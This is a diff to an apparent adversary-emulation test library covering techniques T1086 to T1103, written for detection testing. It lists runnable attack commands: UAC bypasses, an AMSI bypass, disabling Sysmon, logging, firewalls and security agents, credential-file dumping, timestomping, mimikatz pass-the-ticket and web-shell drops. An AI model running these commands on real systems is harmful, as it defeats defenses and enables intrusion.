@@ -298,15 +343,26 @@ Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blo
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
powershell.exe -version 2 -Command Write-Host $PSVersion
```
#### Commands to Check Prerequisites:
#### Dependencies: Run with `powershell`!
##### Description: PowerShell version 2 must be installed
##### Check Prereq Commands:
```
if(2 -in $PSVersionTable.PSCompatibleVersions.Major){0}else{1}
if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {0} else {1}
```
##### Get Prereq Commands:
```
Write-Host Automated installer not implemented yet, please install PowerShell v2 manually
```
<br/>
@@ -318,26 +374,37 @@ Creates a file with an alternate data stream and simulates executing that hidden
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| ads_file | File created to store Alternate Stream Data | String | $env:TEMP\NTFS_ADS.txt|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
```
#### Commands to Check Prerequisites:
```
if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS"){0}else{1}
```
#### Cleanup Commands:
```
Remove:Item #{ads_file}
```
#### Dependencies: Run with `powershell`!
##### Description: Homedrive must be an NTFS drive
##### Check Prereq Commands:
```
if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {0} else {1}
```
##### Get Prereq Commands:
```
Write-Host Prereq's for this test cannot be met automatically
```
<br/>
atomics/T1086/T1086.yaml
+18 -4
View File
@@ -203,11 +203,18 @@ atomic_tests:
Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
supported_platforms:
- windows
dependencies:
- description: |
PowerShell version 2 must be installed
prereq_command: |
if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {0} else {1}
get_prereq_command: |
Write-Host Automated installer not implemented yet, please install PowerShell v2 manually
executor:
name: powershell
elevation_required: false
prereq_command: |
if(2 -in $PSVersionTable.PSCompatibleVersions.Major){0}else{1}
command: |
powershell.exe -version 2 -Command Write-Host $PSVersion
@@ -221,11 +228,18 @@ atomic_tests:
description: File created to store Alternate Stream Data
type: String
default: $env:TEMP\NTFS_ADS.txt
dependencies:
- description: |
Homedrive must be an NTFS drive
prereq_command: |
if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {0} else {1}
get_prereq_command: |
Write-Host Prereq's for this test cannot be met automatically
executor:
name: powershell
elevation_required: false
prereq_command: | # Checks to verify that $env:HOMEDRIVE is an NTFS drive
if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS"){0}else{1}
command: |
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
atomics/T1087/T1087.md
+59 -15
View File
@@ -57,18 +57,22 @@ Enumerate all accounts by copying /etc/passwd to another file
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
cat /etc/passwd > #{output_file}
```
<br/>
<br/>
@@ -78,18 +82,22 @@ cat /etc/passwd > #{output_file}
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
cat /etc/sudoers > #{output_file}
```
<br/>
<br/>
@@ -99,18 +107,22 @@ View accounts wtih UID 0
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
grep 'x:0:' /etc/passwd > #{output_file}
```
<br/>
<br/>
@@ -120,13 +132,17 @@ List opened files by user
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
```
<br/>
<br/>
@@ -136,18 +152,22 @@ Show if a user account has ever logger in remotely
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where captured results will be placed | Path | ~/loot.txt|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
lastlog > #{output_file}
```
<br/>
<br/>
@@ -157,7 +177,8 @@ Utilize groups and id to enumerate users and groups
**Supported Platforms:** Linux, macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
groups
id
@@ -165,6 +186,9 @@ id
<br/>
<br/>
@@ -174,7 +198,8 @@ Utilize local utilities to enumerate users and groups
**Supported Platforms:** macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
dscl . list /Groups
dscl . list /Users
@@ -185,6 +210,9 @@ dscacheutil -q user
<br/>
<br/>
@@ -194,7 +222,8 @@ Enumerate all accounts
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
net user
net user /domain
@@ -206,6 +235,9 @@ net localgroup
<br/>
<br/>
@@ -215,7 +247,8 @@ Enumerate all accounts via PowerShell
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
net user
net user /domain
@@ -232,6 +265,9 @@ net localgroup
<br/>
<br/>
@@ -241,13 +277,17 @@ Enumerate logged on users
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
query user
```
<br/>
<br/>
@@ -257,11 +297,15 @@ Enumerate logged on users via PowerShell
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
query user
```
<br/>
atomics/T1088/T1088.md
+42 -18
View File
@@ -33,23 +33,27 @@ Bypasses User Account Control using Event Viewer and a relevant Windows Registry
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe /c eventvwr.msc
```
#### Cleanup Commands:
```
reg.exe delete hkcu\software\classes\mscfile /f
```
<br/>
<br/>
@@ -59,24 +63,28 @@ PowerShell code to bypass User Account Control using Event Viewer and a relevant
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
```
#### Cleanup Commands:
```
Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse
```
<br/>
<br/>
@@ -86,24 +94,28 @@ Bypasses User Account Control using the Windows 10 Features on Demand Helper (fo
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
```
#### Cleanup Commands:
```
reg.exe delete hkcu\software\classes\ms-settings /f
```
<br/>
<br/>
@@ -113,12 +125,13 @@ PowerShell code to bypass User Account Control using the Windows 10 Features on
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
@@ -126,12 +139,15 @@ Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "
Start-Process "C:\Windows\System32\fodhelper.exe"
```
#### Cleanup Commands:
```
Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse
```
<br/>
<br/>
@@ -141,12 +157,13 @@ PowerShell code to bypass User Account Control using ComputerDefaults.exe on Win
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
@@ -154,12 +171,15 @@ Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "
Start-Process "C:\Windows\System32\ComputerDefaults.exe"
```
#### Cleanup Commands:
```
Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse
```
<br/>
<br/>
@@ -169,23 +189,27 @@ Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC by
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
mkdir "\\?\C:\Windows \System32\"
copy "#{executable_binary}" "\\?\C:\Windows \System32\mmc.exe"
mklink c:\testbypass.exe "\\?\C:\Windows \System32\mmc.exe"
```
#### Cleanup Commands:
```
rd "\\?\C:\Windows \" /S /Q
del "c:\testbypass.exe"
```
<br/>
atomics/T1089/T1089.md
+125 -37
View File
@@ -43,7 +43,8 @@ Disables the iptables firewall
**Supported Platforms:** Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
@@ -59,6 +60,9 @@ fi
<br/>
<br/>
@@ -68,7 +72,8 @@ Disables syslog collection
**Supported Platforms:** Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
@@ -82,6 +87,9 @@ fi
<br/>
<br/>
@@ -91,7 +99,8 @@ Disable the Cb Response service
**Supported Platforms:** Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
@@ -105,6 +114,9 @@ fi
<br/>
<br/>
@@ -114,13 +126,17 @@ Disables SELinux enforcement
**Supported Platforms:** Linux
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
setenforce 0
```
<br/>
<br/>
@@ -130,13 +146,17 @@ Disables Carbon Black Response
**Supported Platforms:** macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist
```
<br/>
<br/>
@@ -146,13 +166,17 @@ Disables LittleSnitch
**Supported Platforms:** macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist
```
<br/>
<br/>
@@ -162,13 +186,17 @@ Disables OpenDNS Umbrella
**Supported Platforms:** macOS
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist
```
<br/>
<br/>
@@ -178,21 +206,17 @@ Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon servic
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sysmon_driver | The name of the Sysmon filter driver (this can change from the default) | string | SysmonDrv|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
fltmc.exe unload #{sysmon_driver}
```
#### Commands to Check Prerequisites:
```
fltmc.exe filters | findstr #{sysmon_driver}
```
#### Cleanup Commands:
```
sc stop sysmon
@@ -200,6 +224,21 @@ fltmc.exe load #{sysmon_driver}
sc start sysmon
```
#### Dependencies: Run with `command_prompt`!
##### Description: Sysmon filter must be loaded
##### Check Prereq Commands:
```
fltmc.exe filters | findstr #{sysmon_driver}
```
##### Get Prereq Commands:
```
echo Automated installer not implemented yet, please install Sysmon manually
```
<br/>
<br/>
@@ -210,26 +249,26 @@ This action requires HTTP logging configurations in IIS to be unlocked.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| website_name | The name of the website on a server | string | Default Web Site|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true
```
#### Commands to Check Prerequisites:
```
if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {0} else {1}
```
#### Cleanup Commands:
```
C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false
```
<br/>
<br/>
@@ -239,21 +278,50 @@ Uninstall Sysinternals Sysmon for Defense Evasion
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sysmon_exe | The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH) | Path | PathToAtomicsFolder\T1089\bin\sysmon.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
sysmon -u
```
#### Commands to Check Prerequisites:
```
sc query sysmon > nul
```
#### Cleanup Commands:
```
sysmon -i -accepteula
```
#### Dependencies: Run with `powershell`!
##### Description: Sysmon executable must be available
##### Check Prereq Commands:
```
if(cmd /c where sysmon) {0} else {1}
```
##### Get Prereq Commands:
```
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
```
##### Description: Sysmon must be installed
##### Check Prereq Commands:
```
if(cmd /c sc query sysmon) {0} else {1}
```
##### Get Prereq Commands:
```
cmd /c sysmon -i -accepteula
```
<br/>
<br/>
@@ -264,17 +332,21 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
#### Cleanup Commands:
```
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$false)
```
<br/>
<br/>
@@ -285,17 +357,21 @@ This test removes the Windows Defender provider registry key.
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse
```
#### Cleanup Commands:
```
New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}"
```
<br/>
<br/>
@@ -305,24 +381,28 @@ With administrative rights, an adversary can disable Windows Services related to
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| service_name | The name of the service to stop | String | McAfeeDLPAgentService|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
net.exe stop #{service_name}
sc.exe config #{service_name} start= disabled
```
#### Cleanup Commands:
```
sc.exe config #{service_name} start= auto
net.exe start #{service_name}
```
<br/>
<br/>
@@ -334,7 +414,8 @@ Credit to Matt Graeber (@mattifestation) for the research.
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
@@ -342,7 +423,6 @@ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
```
#### Cleanup Commands:
```
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
@@ -351,6 +431,10 @@ $GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 1
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 1
```
<br/>
<br/>
@@ -362,11 +446,15 @@ Credit to Matt Graeber (@mattifestation) for the research.
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
```
<br/>
atomics/T1089/T1089.yaml
+37 -2
View File
@@ -106,6 +106,15 @@ atomic_tests:
description: The name of the Sysmon filter driver (this can change from the default)
type: string
default: SysmonDrv
dependencies:
- description: |
Sysmon filter must be loaded
prereq_command: |
fltmc.exe filters | findstr #{sysmon_driver}
get_prereq_command: |
echo Automated installer not implemented yet, please install Sysmon manually
executor:
name: command_prompt
elevation_required: true
@@ -124,11 +133,13 @@ atomic_tests:
This action requires HTTP logging configurations in IIS to be unlocked.
supported_platforms:
- windows
input_arguments:
website_name:
description: The name of the website on a server
type: string
default: Default Web Site
executor:
name: powershell
prereq_command: |
@@ -143,11 +154,35 @@ atomic_tests:
Uninstall Sysinternals Sysmon for Defense Evasion
supported_platforms:
- windows
input_arguments:
sysmon_exe:
description: The location of the Sysmon executable from Sysinternals (ignored if sysmon.exe is found in your PATH)
type: Path
default: PathToAtomicsFolder\T1089\bin\sysmon.exe
dependency_executor_name: powershell
dependencies:
- description: |
Sysmon executable must be available
prereq_command: |
if(cmd /c where sysmon) {0} else {1}
get_prereq_command: |
$parentpath = Split-Path "#{sysmon_exe}"; $zippath = "$parentpath\Sysmon.zip"
New-Item -ItemType Directory $parentpath -Force | Out-Null
Invoke-WebRequest "https://download.sysinternals.com/files/Sysmon.zip" -OutFile "$zippath"
Expand-Archive $zippath $parentpath -Force; Remove-Item $zippath
if(-not ($Env:Path).contains($parentpath)){$Env:Path += ";$parentpath"}
- description: |
Sysmon must be installed
prereq_command: |
if(cmd /c sc query sysmon) {0} else {1}
get_prereq_command: |
cmd /c sysmon -i -accepteula
executor:
name: command_prompt
elevation_required: true
prereq_command: |
sc query sysmon > nul
command: |
sysmon -u
cleanup_command: |
atomics/T1090/T1090.md
+14 -6
View File
@@ -23,24 +23,28 @@ Note that this test may conflict with pre-existing system configuration.
**Supported Platforms:** macOS, Linux
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080|
| proxy_scheme | Protocol to proxy (http or https) | string | http|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
export #{proxy_scheme}_proxy=#{proxy_server}
```
#### Cleanup Commands:
```
unset http_proxy
unset https_proxy
```
<br/>
<br/>
@@ -51,22 +55,26 @@ HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| listenport | Specifies the IPv4 port, by port number or service name, on which to listen. | string | 1337|
| connectport | Specifies the IPv4 port, by port number or service name, to which to connect. If connectport is not specified, the default is the value of listenport on the local computer. | string | 1337|
| connectaddress | Specifies the IPv4 address to which to connect. Acceptable values are IP address, computer NetBIOS name, or computer DNS name. If an address is not specified, the default is the local computer. | string | 127.0.0.1|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress}
```
#### Cleanup Commands:
```
netsh interface portproxy delete v4tov4 listenport=#{listenport}
```
<br/>
atomics/T1093/T1093.md
+7 -3
View File
@@ -16,7 +16,7 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| parent_process_name | Name of the parent process | string | explorer|
@@ -24,17 +24,21 @@ Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/
| hollow_binary_path | Path of the binary to hollow (executable that will run inside the sponsor) | string | C:\Windows\System32\cmd.exe|
| spawnto_process_name | Name of the process to spawn | string | calc|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
. $PathToAtomicsFolder\T1093\src\Start-Hollow.ps1
$ppid=Get-Process #{parent_process_name} | select -expand id
Start-Hollow -Sponsor "#{sponsor_binary_path}" -Hollow "#{hollow_binary_path}" -ParentPID $ppid -Verbose
```
#### Cleanup Commands:
```
Stop-Process -Name "#{spawnto_process_name}"
```
<br/>
atomics/T1096/T1096.md
+6 -2
View File
@@ -21,12 +21,13 @@ Execute from Alternate Streams
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| path | Path of ADS file | path | c:\ADS\|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 #{path}\procexp.cab #{path}\file.txt:procexp.exe
@@ -42,4 +43,7 @@ esentutl.exe /y #{path}\autoruns.exe /d #{path}\file.txt:autoruns.exe /o
<br/>
atomics/T1097/T1097.md
+6 -2
View File
@@ -21,17 +21,21 @@ Similar to PTH, but attacking Kerberos
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| user_name | username | string | Administrator|
| domain | domain | string | atomic.local|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
mimikatz # kerberos::ptt #{user_name}@#{domain}
```
<br/>
atomics/T1098/T1098.md
+5 -1
View File
@@ -27,7 +27,8 @@ Manipulate Admin Account Name
**Supported Platforms:** Windows
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
$x = Get-Random -Minimum 2 -Maximum 9999
$y = Get-Random -Minimum 2 -Maximum 9999
@@ -49,4 +50,7 @@ foreach($member in $fmm) {
<br/>
atomics/T1099/T1099.md
+42 -14
View File
@@ -27,18 +27,22 @@ Stomps on the access timestamp of a file
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
touch -a -t 197001010000.00 #{target_filename}
```
<br/>
<br/>
@@ -48,18 +52,22 @@ Stomps on the modification timestamp of a file
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
touch -m -t 197001010000.00 #{target_filename}
```
<br/>
<br/>
@@ -72,12 +80,13 @@ Sudo or root privileges are required to change date. Use with caution.
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
NOW=$(date)
date -s "1970-01-01 00:00:00"
@@ -88,6 +97,9 @@ stat #{target_filename}
<br/>
<br/>
@@ -99,19 +111,23 @@ This technique was used by the threat actor Rocke during the compromise of Linux
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| reference_file_path | Path of reference file to read timestamps from | Path | /bin/sh|
| target_file_path | Path of file to modify timestamps of | Path | /opt/filename|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
touch -acmr #{reference_file_path} {target_file_path}
```
<br/>
<br/>
@@ -123,19 +139,23 @@ This technique was seen in use by the Stitch RAT.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path of file to change creation timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
powershell.exe Get-ChildItem #{file_path} | % { $_.CreationTime = #{target_date_time} }
```
<br/>
<br/>
@@ -147,19 +167,23 @@ This technique was seen in use by the Stitch RAT.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path of file to change last modified timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
powershell.exe Get-ChildItem #{file_path} | % { $_.LastWriteTime = #{target_date_time} }
```
<br/>
<br/>
@@ -171,17 +195,21 @@ This technique was seen in use by the Stitch RAT.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| file_path | Path of file to change last access timestamp | Path | C:\Some\file.txt|
| target_date_time | Date/time to replace original timestamps with | String | 1970-01-01 00:00:00|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
powershell.exe Get-ChildItem #{file_path} | % { $_.LastAccessTime = #{target_date_time} }
```
<br/>
atomics/T1100/T1100.md
+7 -3
View File
@@ -19,21 +19,25 @@ cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| web_shell_path | The path to drop the web shell | string | C:\inetpub\wwwroot|
| web_shells | Path of Web Shell | path | PathToAtomicsFolder\T1100\shells\|
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
xcopy #{web_shells} #{web_shell_path}
```
#### Cleanup Commands:
```
del #{web_shell_path}
```
<br/>
atomics/T1101/T1101.md
+6 -2
View File
@@ -15,12 +15,13 @@ Add a value to a Windows registry SSP key, simulating an adversarial modificatio
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| fake_ssp_dll | Value added to registry key. Normally refers to a DLL name in C:\Windows\System32. | String | not-a-ssp|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
# run these in sequence
$SecurityPackages = Get-ItemProperty HKLM:\System\CurrentControlSet\Control\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'
@@ -34,4 +35,7 @@ Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Pack
<br/>
atomics/T1102/T1102.md
+12 -4
View File
@@ -23,17 +23,21 @@ Download data from a public website using command line
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
bitsadmin.exe /transfer "DonwloadFile" http://www.stealmylogin.com/ %TEMP%\bitsadmindownload.html
```
#### Cleanup Commands:
```
del %TEMP%\bitsadmindownload.html
```
<br/>
<br/>
@@ -43,7 +47,8 @@ Multiple download methods for files using powershell
**Supported Platforms:** Windows
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
Invoke-WebRequest -Uri www.twitter.com
$T1102 = (New-Object System.Net.WebClient).DownloadData("https://www.reddit.com/")
@@ -51,10 +56,13 @@ $wc = New-Object System.Net.WebClient
$T1102 = $wc.DownloadString("https://www.aol.com/")
```
#### Cleanup Commands:
```
Clear-Variable T1102
```
<br/>
atomics/T1103/T1103.md
+6 -2
View File
